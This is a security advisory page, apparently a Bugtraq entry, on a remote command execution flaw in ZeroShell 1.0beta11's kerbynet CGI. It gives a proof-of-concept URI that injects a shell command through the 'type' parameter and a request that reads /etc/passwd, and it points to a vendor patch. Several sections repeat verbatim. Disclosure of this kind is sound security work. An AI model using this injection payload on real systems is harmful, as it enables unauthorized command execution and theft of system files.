ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability
BID:33702
Info
ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability
| Bugtraq ID: | 33702 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-0545 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 09 2009 12:00AM |
| Updated: | Feb 23 2009 01:57PM |
| Credit: | Luca Carettoni |
| Vulnerable: |
Fulvio Ricciardi ZeroShell 1.0beta11 |
| Not Vulnerable: | |
Discussion
ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability
ZeroShell is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the software fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
ZeroShell 1.0beta11 is vulnerable; other versions may also be affected.
ZeroShell is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the software fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
ZeroShell 1.0beta11 is vulnerable; other versions may also be affected.
Exploit / POC
ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability
An attacker may exploit this issue via a browser.
The following example URI and request are available:
http://www.example.com/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;[CMD HERE];%22
HTTP request:
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: IP
An attacker may exploit this issue via a browser.
The following example URI and request are available:
http://www.example.com/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;[CMD HERE];%22
HTTP request:
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: IP
Solution / Fix
ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability
Solution:
A patch is available; please see the references for more information.
Fulvio Ricciardi ZeroShell 1.0beta11
Solution:
A patch is available; please see the references for more information.
Fulvio Ricciardi ZeroShell 1.0beta11
-
Fulvio Ricciardi C100-Security-Fix-beta11.tar.bz2
http://www.zeroshell.net/listing/C100-Security-Fix-beta11.tar.bz2
References
ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability
References:
References:
- Security Fix - Unauthenticated remote code execution (Fulvio Ricciardi)
- ZeroShell <= 1.0beta11 Remote Code Execution (Luca Carettoni)
- ZeroShell Homepage (Fulvio Ricciardi)